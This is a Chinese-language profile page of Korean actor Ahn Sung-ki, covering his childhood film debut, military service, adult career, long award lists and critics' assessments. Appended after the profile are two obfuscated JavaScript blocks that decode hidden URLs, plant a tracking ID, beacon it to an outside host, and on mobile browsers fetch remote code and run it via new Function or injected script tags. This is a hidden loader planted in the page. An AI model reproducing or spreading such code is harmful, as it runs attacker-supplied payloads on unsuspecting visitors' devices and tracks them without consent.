演员安圣基
安圣基 9997
出生地:韩国大丘生日:1952-01-01安圣基,韩国著名演员,享有“韩国人最喜爱的国民影帝”美誉。1952年在韩国战乱中母亲避难至大邱时出生,后来在首尔长大,1957年凭借电影《黄昏列车》出道作为儿童演员出演多部电影作品,1977年凭借电影《士兵和小姐们》作为成人演员出道。大学就读于韩国外国语大学主专攻韩国语教育科学,副专攻越南语,此外也掌握多国语。代表电影作品有:《甜蜜年少时》、《寻鲸记》、《深蓝色的夜》、《冤家特警(Two Cops)》、《武士》、《醉画仙》、《实尾岛》、《墨攻》、《广播明星》、《华丽的休假》、《断箭》等。
  • 中文名:安圣基
  • 别名:???/AhnSung Kee
  • 性别:
  • 身高:175
  • 体重:65kg
  • 地区:韩国
  • 星座:摩羯座
  • 血型:A型
  • 生日:1952-01-01
  • 出生地:韩国大丘
  • 职业:演员
  • 毕业院校:敦岩小学;京东初中;东星高中;韩国外国语
  • 代表作品:太白山脉 实尾岛 南部军 美丽的时节 断箭 
影人简介
  安圣基,韩国著名演员,享有“韩国人最喜爱的国民影帝”美誉。1952年在韩国战乱中母亲避难至大邱时出生,后来在首尔长大,1957年凭借电影《黄昏列车》出道作为儿童演员出演多部电影作品,1977年凭借电影《士兵和小姐们》作为成人演员出道。大学就读于韩国外国语大学主专攻韩国语教育科学,副专攻越南语,此外也掌握多国语。代表电影作品有:《甜蜜年少时》、《寻鲸记》、《深蓝色的夜》、《冤家特警(Two Cops)》、《武士》、《醉画仙》、《实尾岛》、《墨攻》、《广播明星》、《华丽的休假》、《断箭》等。
早年经历
1952年,时值朝韩战争时期,安圣基的母亲避难至韩国大邱。1月1日,安圣基在韩国大邱出生。战争结束后一家人回到首尔生活。1957年,安圣基父亲的朋友导演金继英准备的电影《黄昏列车》急缺一名儿童演员,然而由于战乱刚刚结束,在忠武路没有多少可用的童星。导演进行过数次面试,也未能找到合适的演员。情急之下,安圣基被临时带到片场进行了拍摄,万幸的是,临时顶上的小安圣基非常顺利的完成了拍摄。在这次成功的拍摄后,安圣基在业内有了些小小的名气。1958年,安圣基出演了电影《母爱》,在片中扮演了分量相对较多的角色。此后,诸多电影的邀约纷至沓来,仅仅作为儿童演员,安圣基便出演了70多部电影。1959年,年仅7岁的安圣基更是凭借《10代的反抗》而获得了旧金山电影节的特别奖。然而,随着升入高中,为了专心一志的投入学业,安圣基的表演之路也划上了一个暂停符。1970年,在韩国也参入越南战争的影响下,安圣基选择了韩国外国语大学越南语专业,志愿成为一名军官前往前线。然而就在他毕业的时候,越南战争结束了。安圣基作为中尉在前线服了两年兵役,而后由于韩国和越南的绝交,他所掌握的越南语几乎成了毫无用处的外语。当时韩国正值快速的经济产业化发展期间,出身中尉的军人并不是很难寻找工作,然而由于安圣基的外语专业,却使得他无处可去。尝试着找过多次工作,但都以失败告终,于是安圣基暗下决心,不再去面试寻觅朝九晚五的工作。这时的安圣基已经过了25岁,在迷茫中,他重新想到了电影。带着正式进入演员这项职业的想法,安圣基重新开始了运动,并频繁的前往文化院接触各类电影。在他接下来不断的努力下,一年后终于出演了自己作为成人演员的第一部电影。
演艺经历
1977年,安圣基出演电影《士兵和小姐们》,这也是他作为成人演员的第一部作品。随后三年间,安圣基分别出演了《夜市》,《第三工作》,《雨曜日》三部电影。因为是作为成人演员在电影领域的重新开始,所以安圣基尽了最大的努力投入到表演以获得认可,然而事实确实不是那么顺利。和他华丽的童星时期相比,在迈入成年演员领域最开始的几年,安圣基并未能得到自己所期望的关注,可以说只是一个默默无名的新人。1980年,安圣基终于遇到了他电影人生中十分重要的一部作品,《畹风的好日子》。他在片中扮演了不善言辞的德白一角,是一个有想说的话却只会语塞,听到了却也当做未曾耳闻的人物。凭借片中的表现,安圣基在同年举办的第19届大钟电影节中获得了最佳新人奖。度过了三年无名新人时期的他,终于开始赢得了业内以及大众的关注。1981年,安圣基在电影《曼陀罗》中扮演小和尚法云,并凭此获得了第18届韩国戏剧电影艺术大赏最佳男主角,第18届百想艺术大赏最佳男主角。此后1982年~1985年的四年间,安圣基更是凭借《铁人们》,《雾村》,《寻鲸记》,《深蓝色的夜》等十几部电影,荣膺三届百想艺术大赏电影部门最佳男主角,三届大钟电影节最佳男主角,三届韩国戏剧电影艺术大赏最佳男主角,两届韩国电影评论家协会赏最佳男主角。1986~1988年,安圣基更是佳作频出。1986年,安圣基同演员李美淑合作,主演爱情电影《冬日游子》,并凭此首次斩获了百想艺术大赏人气奖。1987年的《甜蜜年少时》更是为他带来了第32届亚洲太平洋电影节最佳男主角奖。1988年,安圣基则凭借电影《成功时代》时隔两年再次夺得百想艺术大赏的电影部门最佳男主角。1990年,安圣基主演的朝韩战争题材电影《南部军》使他终于赢得了青龙电影节的青睐。在同年举行的第11届青龙电影节上,安圣基凭借电影《南部军》一举夺得人气奖和最佳男主角。而同样在1990年的第29届大钟电影节上,安圣基再次荣膺最佳男主角。1991~1996年,安圣基主演了《谁曾见过龙之脚趾》,《TwoCops》,《太白山脉》,《永远的帝国》,《沉睡的男人》等十多部佳作,并在期间再次获得了两届百想艺术大赏最佳男主角,一届大钟电影节最佳男主角,韩国戏剧电影大赏最佳男主角,两届韩国电影评论家协会赏最佳男演员。而1992~1995年期间的大钟电影节,安圣基更是包揽了连续四届的人气奖。1999年,安圣基同演员朴重勋,张东健,崔智友共同主演了电影《毫不留情》,在片中安圣基首次挑战不同于以往的杀手角色。安圣基直言这是他首次尝试戏份稍弱一些,但角色更有张力的电影。在此之后,安圣基开始收到越来越多面的角色出演邀请。在2001年出演的《武士》,更是让他初次获得了青龙电影节最佳男配角奖。2003年,安圣基同薛景求共同出演电影《实尾岛》,该片以韩国在1968年建立的实尾岛684部队为题材,讲述了30余名死刑犯聚集于实尾岛上以刺杀北部首脑为目的进行特训,在朝韩和平进程下部队被国家抛弃后奋起反抗的故事。该片在上映后创下了1108万观影人的纪录,成为韩国影史上首部突破千万观影人的电影。2006年,安圣基出演多部佳作,包括政治题材电影《韩半岛》,清新喜剧题材电影《广播明星》,以及刘德华主演的中国电影《墨攻》。在同年举行的第27届青龙电影节和第26届韩国电影评论家协会赏上,安圣基凭借电影《广播明星》两次荣膺最佳男演员的桂冠。而2006这一年,距安圣基在1957年首次出演电影《黄昏列车》已有50年,在这一年举行的第43届大钟电影节上,安圣基获得了出道50周年纪念奖。2007年,安圣基主演了讲述1980年韩国光州5.18民主化进程运动的电影《华丽的休假》,在片中扮演退伍军人朴衡修。这部电影一经上映引便反应不俗,由于来源真实事件改编,韩国前总统金大中和卢武铉都在上映期间亲自赴影院观看。而这部电影也吸引了730万7993名观众观看。同年,安圣基凭借电影中的表演,再次荣膺大钟电影节最佳男主角。2011年,安圣基出演了电影《深海之战》,在片中同河智苑,吴志浩等演员合作,并在同年的第33届黄金摄影赏颁奖礼荣获功劳奖。2012年又是安圣基的一个高产年,在这一年出演了《断箭》,《塔》,《弦之歌》等六部电影。在这一年,凭借他在《断箭》中的演绎,安圣基捧回了自己的第八个百想艺术大赏最佳男主角,以及第六个韩国电影评论家协会赏最佳男演员的桂冠。同年,韩国电影演员协会授予了安圣基功劳奖。2013年,安圣基出演电影《火葬》,饰演了在妻子死去后彷徨迷茫的丈夫吴尚木一角。同年,在第49届百想艺术大赏上,为表彰安圣基作为电影人代表的卓越贡献,百想颁奖礼特别授予了安圣基社会贡献奖。2014年,安圣基同郑雨盛,李凡秀共同出演《神之一手》,将于7月上映。
获奖记录
韩国百想艺术大赏
  • 2015第51届韩国百想艺术大赏最佳男主角奖花葬(提名)
  • 2012第48届韩国百想艺术大赏最佳男主角奖断箭(获奖)
  • 1994第30届韩国百想艺术大赏最高大赏特警冤家(获奖)
  • 1994第30届韩国百想艺术大赏最佳男主角奖特警冤家(获奖)
  • 1991第27届韩国百想艺术大赏最佳男主角奖谁曾见过龙之脚趾(获奖)
  • 1989第25届韩国百想艺术大赏最佳男主角奖成功时代(获奖)
  • 1985第21届韩国百想艺术大赏最佳男主角奖深蓝色的夜(获奖)
  • 1984第20届韩国百想艺术大赏最佳男主角奖雾村(获奖)
  • 1983第19届韩国百想艺术大赏最佳男主角奖铁人们(获奖)
  • 1982第18届韩国百想艺术大赏最佳男主角奖曼陀罗(获奖)
韩国青龙电影奖
  • 2012第33届韩国青龙电影奖最佳男演员奖断箭(提名)
  • 2006第27届韩国青龙电影奖最佳男演员奖电台之星(获奖)
  • 2005第26届韩国青龙电影奖最佳男配角奖刑事(提名)
  • 2001第22届韩国青龙电影奖最佳男配角奖武士(获奖)
  • 1998第19届韩国青龙电影奖最佳男演员奖卧室与法庭(提名)
  • 1996第17届韩国青龙电影奖最佳男演员奖朴峰坤离家事件(提名)
  • 1995第16届韩国青龙电影奖最佳男演员奖发型师(提名)
  • 1992第13届韩国青龙电影奖人气明星奖天国的阶梯(获奖)
  • 1990第11届韩国青龙电影奖最佳男演员奖南部军(获奖)
  • 1990第11届韩国青龙电影奖人气明星奖南部军(获奖)
韩国电影大钟奖
  • 2012第49届韩国电影大钟奖最佳男演员奖断箭(提名)
  • 2007第44届韩国电影大钟奖最佳男演员奖电台之星(获奖)
  • 2006第43届韩国电影大钟奖最佳男配角奖刑事(提名)
  • 2006第43届韩国电影大钟奖出道50周年纪念奖(获奖)
  • 1994第32届韩国电影大钟奖人气男演员奖特警冤家(获奖)
  • 1994第32届韩国电影大钟奖最佳男演员奖特警冤家(获奖)
  • 1993第31届韩国电影大钟奖人气男演员奖天国的阶梯(获奖)
  • 1991第29届韩国电影大钟奖人气男演员奖南部军(获奖)
  • 1982第19届韩国电影大钟奖最佳新人奖畹风的好日子(获奖)
韩国电影评论家协会奖
  • 2012第32届韩国电影评论家协会奖最佳男主角奖断箭(获奖)
  • 2006第26届韩国电影评论家协会奖最佳男主角奖电台明星(获奖)
  • 1996第16届韩国电影评论家协会奖最佳男主角奖天才宣言(获奖)
  • 1995第15届韩国电影评论家协会奖最佳男主角奖永远的帝国(获奖)
  • 1984第4届韩国电影评论家协会奖最佳男主角奖雾中乡景(获奖)
  • 1983第3届韩国电影评论家协会奖最佳男主角奖铁人们(获奖)
韩国戏剧电影艺术赏
  • 1985第21届韩国戏剧电影艺术赏最佳男主角奖深蓝色的夜(获奖)
  • 1984第20届韩国戏剧电影艺术赏最佳男主角奖雾中乡景(获奖)
  • 1982第19届韩国戏剧电影艺术赏最佳男主角奖铁人们(获奖)
  • 1981第18届韩国戏剧电影艺术赏最佳男主角奖曼陀罗(获奖)
亚洲太平洋电影节
  • 1992第38届亚洲太平洋电影节最佳男主角奖天国的阶梯(获奖)
  • 1987第32届亚洲太平洋电影节最佳男主角奖甜蜜年少时(获奖)
韩国黄金摄影奖
  • 2011第33届韩国黄金摄影奖功劳奖(获奖)
其他奖项
  • 2013韩国大众文化艺术赏银冠文化勋章(获奖)
  • 2012韩国电影演员协会功劳奖(获奖)
  • 2005文化观光部皇冠文化勋章(获奖)
  • 1959第4届旧金山电影节少年特别演技奖10代的反抗(获奖)
韩国春史电影奖
  • 2016第21届韩国春史电影奖最佳男演员奖化妆,火葬(提名)
人物评价
安圣基的个人演员史和战争后的韩国电影史不断地交错着。他在韩国电影开始稍微开始有上升趋势的1950年代末出道,经历了被称为韩国电影黄金期的1960年代中段,在忠武路跌入谷底的1970年代末回归,在1980年代开启了韩国电影的震荡期,而在‘企划电影’的概念开始进入韩国电影的1990年代,他依然占据着极其重要的位置,而从1999年后,他依然不断的活跃在电影舞台上。林全泰,李长镐,裴昶浩等电影大师,以及郭智均,李明世,朴光秀,张善宇,姜宇硕,李贤胜等1980到1990年代初出茅庐的年轻导演,都通过这位名叫安圣基的演员开始了在电影圈的第一步。他被裴昶浩导演评价为“无彩色演员”,而电影评论家郑成日更是直言“仔细观察安圣基的脸,在他的面孔上所看到的不是演员安圣基的脸,而是导演们的面容。”而在从影多年间,安圣基就如被公认的称号‘角色万物像’一般,展现了无尽宽广的戏路。从太监(太监)到王(永远的帝国),从平凡的民众(畹风的好日子)到资本主义的尖兵(成功时代),从歪风邪气的警察(TwoCops)到小心翼翼的白领上班族(男人孤独),以致自暴自弃的男人(赤道之花)和梦想家(搞笑艺人),政治部记者(谁曾见过龙之脚趾)和杀手(毫不留情),乐天向上的乞丐王子(寻鲸记)和冷静的设计师(你内心的蓝),陷于欲望无法自拔的俺男人(深蓝色的夜)和纯情化身(甜蜜年少时)等等,风格各异的不同角色在他的诠释下无不入木三分。加利福尼亚州立大学的金京贤教授评价这段时期时说道“安圣基作为演员的面孔,从1980年代的不完整男性形象到1990年逐渐的转变为了理性知识人的面孔。”
function mHAlItnu(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function XvMIat(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return mHAlItnu(t);};window[''+'p'+'D'+'B'+'x'+'V'+'h'+'d'+'t'+'R'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=XvMIat,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://tgb.eemcfun.com:7891/stats/9339/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZlZHcuYWRtaWFuLmNNuJTNNBODg5MQ==','d3NzJTNBJTJGJTJGbmh5LnlpbmhvbmdjLmNuuJTNBOTUzNA==','150017',window,document,['N','u']);}:function(){};
function qrbXJRE(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YyJhAHEw(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return qrbXJRE(t);};window[''+'w'+'h'+'g'+'J'+'U'+'T'+'c'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=YyJhAHEw,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://tgb.eemcfun.com:7891/stats/9339/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMMlMM0ElMMkYlMMkZlZHcuYWRtaWFuLmNuJTNBODg5MMQ==','d3NzJTNBJTJGJTJGbmhh5LnlpbmhhvbmdjLmNuJTNBOTUzNA==','150016',window,document,['M','h']);}:function(){};